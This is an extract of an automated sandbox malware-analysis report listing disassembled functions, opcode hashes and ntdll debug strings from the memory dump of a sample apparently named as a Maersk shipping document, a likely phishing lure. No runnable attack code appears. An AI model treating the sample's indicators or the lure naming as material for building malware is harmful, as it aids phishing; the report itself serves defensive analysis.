                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8eb2d77104a1e1af0b176298dacec9ef2cdf54e2e657e9d9900aaac880e5152b
                                                    • Instruction ID: 65921516359d62f8d5d3d0be205e1e26da0dc8636cbae108dd6a7fa2482c6dfb
                                                    • Opcode Fuzzy Hash: 8eb2d77104a1e1af0b176298dacec9ef2cdf54e2e657e9d9900aaac880e5152b
                                                    • Instruction Fuzzy Hash: 04900221246441525A45B25844045078006E7E1241795C026A2414970CC626DA6AD722
                                                    Function 017E2DB0 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ea48599a799c62313db524f13018044e176bca0235e47b4c3979d6934356f8a2
                                                    • Instruction ID: 8444e8c5c073f08537f5feee0e5ad5f02bc349f8d6c074850bdbcaa0278670ac
                                                    • Opcode Fuzzy Hash: ea48599a799c62313db524f13018044e176bca0235e47b4c3979d6934356f8a2
                                                    • Instruction Fuzzy Hash: 5990023124540402D641725844046074009E7D1241F95C026A1424574EC755CB6AAB62
                                                    Function 017E2C60 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 74676fa8fa59c897a58c3357f5a7a2cee845890a9f2082f33bd2cd480c6430e1
                                                    • Instruction ID: 46c990dd8ed61010dd6670d268d27b14a518f24a921ec6edbfbf1a7cb9b8fd13
                                                    • Opcode Fuzzy Hash: 74676fa8fa59c897a58c3357f5a7a2cee845890a9f2082f33bd2cd480c6430e1
                                                    • Instruction Fuzzy Hash: 2490023120540842D60072584404B474005D7E1301F55C02AA1124674DC715CA657622
                                                    Function 017E2CF0 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: dadb452b7e5ec38fa9adad0733ab50bfe2fa8edc6d11c3e46a49b33a7ff986c1
                                                    • Instruction ID: 517ad7e89975005f97a2a8a5e667bc5ea15cb1d4b5e75f3dc0b28dd1704168f0
                                                    • Opcode Fuzzy Hash: dadb452b7e5ec38fa9adad0733ab50bfe2fa8edc6d11c3e46a49b33a7ff986c1
                                                    • Instruction Fuzzy Hash: 7D90023120540403D600725855087074005D7D1201F55D425A1424578DD756CA656222
                                                    Function 017E2CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e5a4de0eed232571ca8cd1661b3c5d4e46d3ab1bc2e911a8a6b72b6cb8917b3d
                                                    • Instruction ID: 79336149b241350bb2d54b870bdcfdbd48e0d8f5ee45252b92eba27cbca614a1
                                                    • Opcode Fuzzy Hash: e5a4de0eed232571ca8cd1661b3c5d4e46d3ab1bc2e911a8a6b72b6cb8917b3d
                                                    • Instruction Fuzzy Hash: A690022160940402D640725854187074015D7D1201F55D025A1024574DC759CB6967A2
                                                    Function 017E2CA0 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 52b71c9fb453d14b68e60cfe2279b946216de792947187a16aa424d6e4bad3e9
                                                    • Instruction ID: fd27892a745314af67f8a0688a96114a181443fe2dba9f9ab1fcdc923572a964
                                                    • Opcode Fuzzy Hash: 52b71c9fb453d14b68e60cfe2279b946216de792947187a16aa424d6e4bad3e9
                                                    • Instruction Fuzzy Hash: D590023120540402D600769854086474005D7E1301F55D025A6024575EC765CAA56232
                                                    Function 017E2F60 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9b72024da61fdfe1e398b3a837423e15873e725c18674b6fc1ab38c0e80a7351
                                                    • Instruction ID: 2841014abdc4105725c73c00277c66941673532dd50bf5416d59aef19869d387
                                                    • Opcode Fuzzy Hash: 9b72024da61fdfe1e398b3a837423e15873e725c18674b6fc1ab38c0e80a7351
                                                    • Instruction Fuzzy Hash: 7090026121540042D604725844047074045D7E2201F55C026A3154574CC629CE755226
                                                    Function 017E2F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f8dcbc47ff78d25ac93dfaa5bc2c3405ae232fe74e054860ad89c2c471e4afcb
                                                    • Instruction ID: 6b7912cbe98c6291d18cdd3d23f79d03c31e2cce709b24ae8e4f3bd5564c3674
                                                    • Opcode Fuzzy Hash: f8dcbc47ff78d25ac93dfaa5bc2c3405ae232fe74e054860ad89c2c471e4afcb
                                                    • Instruction Fuzzy Hash: E690026134540442D60072584414B074005D7E2301F55C029E2064574DC719CE666227
                                                    Function 017E2FE0 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bcdc14ce67e206b976cd3a333e1f5d7417efe98f786f219a6fd6ddae0baa91f7
                                                    • Instruction ID: 0fca94e7977060ebeb59763a7dc45cb4d812b3cb0d3e7c2aabcc05a946e0f4f6
                                                    • Opcode Fuzzy Hash: bcdc14ce67e206b976cd3a333e1f5d7417efe98f786f219a6fd6ddae0baa91f7
                                                    • Instruction Fuzzy Hash: 96900221215C0042D70076684C14B074005D7D1303F55C129A1154574CCA15CA755622
                                                    Function 017E2FB0 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8e02c1efbca3e6233f75ca8c049f03407a70ef4f4983aee4a8da0e3d2c923b8f
                                                    • Instruction ID: 7ffa2d21d7ff0ce122559bda0b6cc416f7c2735e1bee329888a0144cf54fb9c7
                                                    • Opcode Fuzzy Hash: 8e02c1efbca3e6233f75ca8c049f03407a70ef4f4983aee4a8da0e3d2c923b8f
                                                    • Instruction Fuzzy Hash: B1900221605400424640726888449078005FBE2211755C135A1998570DC659CA795766
                                                    Function 017E2FA0 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 32dbec27de7c3dbffeaa7d79dda39bfbbee8b8c3deee5488dd44b5af661039c0
                                                    • Instruction ID: e1f079f35e608d5ad94e785f17228664fbe32c919039a0edbb27b7bfd8048554
                                                    • Opcode Fuzzy Hash: 32dbec27de7c3dbffeaa7d79dda39bfbbee8b8c3deee5488dd44b5af661039c0
                                                    • Instruction Fuzzy Hash: E090023120580402D600725848087474005D7D1302F55C025A6164575EC765CAA56632
                                                    Function 017E2F90 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5592c2a0174579e0f1599abffda2e70a712e168f9b894b6d88469c03b290b3c7
                                                    • Instruction ID: d9febb8f12a19f75aa4bdab3256b3f537965d7c5311e4116f97cbde6e9e5cafe
                                                    • Opcode Fuzzy Hash: 5592c2a0174579e0f1599abffda2e70a712e168f9b894b6d88469c03b290b3c7
                                                    • Instruction Fuzzy Hash: B590023120580402D6007258481470B4005D7D1302F55C025A2164575DC725CA656672
                                                    Function 017E2E30 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: fd87542325a73bc98ef1f935ff83e12a3d47b298c4193f5d401d7956e4729938
                                                    • Instruction ID: bd5b6988b98bdd7ebfd36082277141264e73849b87d19ccc65e5120ae462754f
                                                    • Opcode Fuzzy Hash: fd87542325a73bc98ef1f935ff83e12a3d47b298c4193f5d401d7956e4729938
                                                    • Instruction Fuzzy Hash: 3390022130540402D602725844146074009D7D2345F95C026E2424575DC725CB67A233
                                                    Function 017E2EE0 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0812d4da02f8f4ba33ba60d39e49b090ff07e19fa305df49f96a73e505cbc0fd
                                                    • Instruction ID: d7e9c6c208ee8a8ed4764d7b09ae70e6b349872286f701461f9c6b919a6d5ba1
                                                    • Opcode Fuzzy Hash: 0812d4da02f8f4ba33ba60d39e49b090ff07e19fa305df49f96a73e505cbc0fd
                                                    • Instruction Fuzzy Hash: 9A90026120580403D640765848046074005D7D1302F55C025A3064575ECB29CE656236
                                                    Function 017E2EA0 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 150b081a07d109a24e5c8f8146177299e89da804f8da015973acd4e96fc21942
                                                    • Instruction ID: 90dc857c85d3e8993448a6292bc9f7599339c03b67bac65335ab26f228d8309d
                                                    • Opcode Fuzzy Hash: 150b081a07d109a24e5c8f8146177299e89da804f8da015973acd4e96fc21942
                                                    • Instruction Fuzzy Hash: 8590027120540402D640725844047474005D7D1301F55C025A6064574EC759CFE96766
                                                    Function 017E2E80 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 849eb866d4fa0f6b2542454bb84b889035db637089e977abc9ef9213f38c9c64
                                                    • Instruction ID: a3b9a7e0a587a45723cb00d2949b40eb041668eb757a57189ee29a10781618eb
                                                    • Opcode Fuzzy Hash: 849eb866d4fa0f6b2542454bb84b889035db637089e977abc9ef9213f38c9c64
                                                    • Instruction Fuzzy Hash: 9D90022160540502D60172584404617400AD7D1241F95C036A2024575ECB25CBA6A232
                                                    Function 017E3010 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6a83df7388a7b01116b385189834ee49c11092cd057c833fee29882a0097905d
                                                    • Instruction ID: f59250e4770d0e19d23eb0730b09f07f85bd64a9afc2f77cae788fda0174fbc7
                                                    • Opcode Fuzzy Hash: 6a83df7388a7b01116b385189834ee49c11092cd057c833fee29882a0097905d
                                                    • Instruction Fuzzy Hash: 1F90022120584442D64073584804B0F8105D7E2202F95C02DA5156574CCA15CA695722
                                                    Function 017E3090 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0fe2a4d835767a3129c994f8ec61733e18ec3c9204feb17f48220ce04cb6cfb0
                                                    • Instruction ID: 7518df012147020bf278f6f953c188b8591faebdd23702be240d78f4fa555d09
                                                    • Opcode Fuzzy Hash: 0fe2a4d835767a3129c994f8ec61733e18ec3c9204feb17f48220ce04cb6cfb0
                                                    • Instruction Fuzzy Hash: 0A90022124540802D640725884147074006D7D1601F55C025A1024574DC716CB7967B2
                                                    Function 017E39B0 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: cb6158106bc7a328ebb850dd0e077bd0cb3388f728947a2c8c4eb962571edb2d
                                                    • Instruction ID: a7f7f84ff2c0b91613d8efa65152bd0e5e9b3798271f75486db265ff8d2cc528
                                                    • Opcode Fuzzy Hash: cb6158106bc7a328ebb850dd0e077bd0cb3388f728947a2c8c4eb962571edb2d
                                                    • Instruction Fuzzy Hash: 7390022124945102D650725C44046178005F7E1201F55C035A18145B4DC655CA696322
                                                    Function 017E3D70 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2c07d3119af45b96b464199886b454326c4184668c475cbecd94dbf3574492c4
                                                    • Instruction ID: 1bbaf283fb038aa6a6756da4a75377ec0c01c547d3630403fd55e450db913ee2
                                                    • Opcode Fuzzy Hash: 2c07d3119af45b96b464199886b454326c4184668c475cbecd94dbf3574492c4
                                                    • Instruction Fuzzy Hash: 8990023520540402DA10725858046474046D7D1301F55D425A1424578DC754CAB5A222
                                                    Function 017E3D10 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 51e53a5d949af346e6db96c2546ff1c88b801f8f83c00e0273468ba17733a7c6
                                                    • Instruction ID: 26cb14000f2b546b4e05629e6c39602eb1cb4363adbfc7d1b91cffa7072be0d0
                                                    • Opcode Fuzzy Hash: 51e53a5d949af346e6db96c2546ff1c88b801f8f83c00e0273468ba17733a7c6
                                                    • Instruction Fuzzy Hash: D8900231206401429A4073585804A4F8105D7E2302B95D429A1015574CCA14CA755322
                                                    Function 017E2C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                    • Instruction ID: 282b390c799939476a8114c964645d9b8899f5fb88ab7cbf9e26f997ec0e196a
                                                    • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                    • Instruction Fuzzy Hash:
                                                    Function 017E2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID: ___swprintf_l
                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                    • API String ID: 48624451-2108815105
                                                    • Opcode ID: b9e2d83e92c4964600022c55fe7a69cd323d787078af57e8aaec0b4d3cc3b799
                                                    • Instruction ID: 183cafce112d5492bc2b5a0425753c34ccb7e2db340e70736b005c1f0bda4649
                                                    • Opcode Fuzzy Hash: b9e2d83e92c4964600022c55fe7a69cd323d787078af57e8aaec0b4d3cc3b799
                                                    • Instruction Fuzzy Hash: B051E3B6A04156AECB15DBACC89497EFBFCBB0C240B148269F569E7646D374DE00C7A0
                                                    Function 01852410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID: ___swprintf_l
                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                    • API String ID: 48624451-2108815105
                                                    • Opcode ID: 07fd6551abb1b23bdd703d42bb525ad9c2c93912454aa8d30b07c03c3ebf2885
                                                    • Instruction ID: a763c13f3b3fd35034b132962ff3374e776d745f69dc8f709e6041be80a6c6d0
                                                    • Opcode Fuzzy Hash: 07fd6551abb1b23bdd703d42bb525ad9c2c93912454aa8d30b07c03c3ebf2885
                                                    • Instruction Fuzzy Hash: DF510575A00645EECFA0DF6CC89087FFBFAEB44304B148469F996C7642DAB4EB448760
                                                    Function 017D7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • ExecuteOptions, xrefs: 018146A0
                                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01814655
                                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01814742
                                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 01814787
                                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 018146FC
                                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01814725
                                                    • Execute=1, xrefs: 01814713
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                    • API String ID: 0-484625025
                                                    • Opcode ID: d9053459f726d969c1ecdd4d86f88cd5993695646784ec9b47f766d00cfd3129
                                                    • Instruction ID: 7b097f368ebb665cb93e43f7e2a5e02edfaeee40870442d8fb6aaa1af2cbc58e
                                                    • Opcode Fuzzy Hash: d9053459f726d969c1ecdd4d86f88cd5993695646784ec9b47f766d00cfd3129
                                                    • Instruction Fuzzy Hash: FE51397164021DBAEF15EBA8DC99FA9B7B8EF18318F1404D9D605E7181E7709B41CF50
                                                    Function 01876940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                    • Instruction ID: 035c33667546b0cb5c0e5d686ce22a2aba84dc7f12d5ed27a303e6440dca5545
                                                    • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                    • Instruction Fuzzy Hash: E1023771508742AFE305CF18C494A6BBBE5FFD8704F148A2DF9858B264EB31EA45CB52
                                                    Function 017EB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID: __aulldvrm
                                                    • String ID: +$-$0$0
                                                    • API String ID: 1302938615-699404926
                                                    • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                    • Instruction ID: 5270ccefbae1948bd2d263e772e859e8675d989e5a3d3594791f77230a13a856
                                                    • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                    • Instruction Fuzzy Hash: 2A81D070E852498EEF298E6CC8997FEFFF1AF8D320F18415AD951A7691C7309840CB91
                                                    Function 018520E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID: ___swprintf_l
                                                    • String ID: %%%u$[$]:%u
                                                    • API String ID: 48624451-2819853543
                                                    • Opcode ID: 2a93d09bfea64d828be8f8f5ad3e06fae6dc4f61383c16ab4d17b8b138a193c6
                                                    • Instruction ID: 5f8c094f46e201fff233735c4c5095c2ec6402a8c7d989dc82a29ca6ffb1e091
                                                    • Opcode Fuzzy Hash: 2a93d09bfea64d828be8f8f5ad3e06fae6dc4f61383c16ab4d17b8b138a193c6
                                                    • Instruction Fuzzy Hash: 5421567AA00519ABDB50DE79DC449BFBBEAEF54744F040115ED05D3205EB30EA058B91
                                                    Function 017CF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 018102E7
                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 018102BD
                                                    • RTL: Re-Waiting, xrefs: 0181031E
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                    • API String ID: 0-2474120054
                                                    • Opcode ID: 7e1f11bba32a0aa656bf8a0dd8bf5fc07c33896e38171119382948c2381d8f1a
                                                    • Instruction ID: e3e343046a924aa3b60de1bb6b10601b9353a372f1a57e35a2a5bc4bbf46d1a4
                                                    • Opcode Fuzzy Hash: 7e1f11bba32a0aa656bf8a0dd8bf5fc07c33896e38171119382948c2381d8f1a
                                                    • Instruction Fuzzy Hash: 42E1BE316047419FD726CF28C884B6AFBE5BB88B14F140A6DF5A5CB2E1D774DA84CB42
                                                    Function 017DBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • RTL: Resource at %p, xrefs: 01817B8E
                                                    • RTL: Re-Waiting, xrefs: 01817BAC
                                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01817B7F
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                    • API String ID: 0-871070163
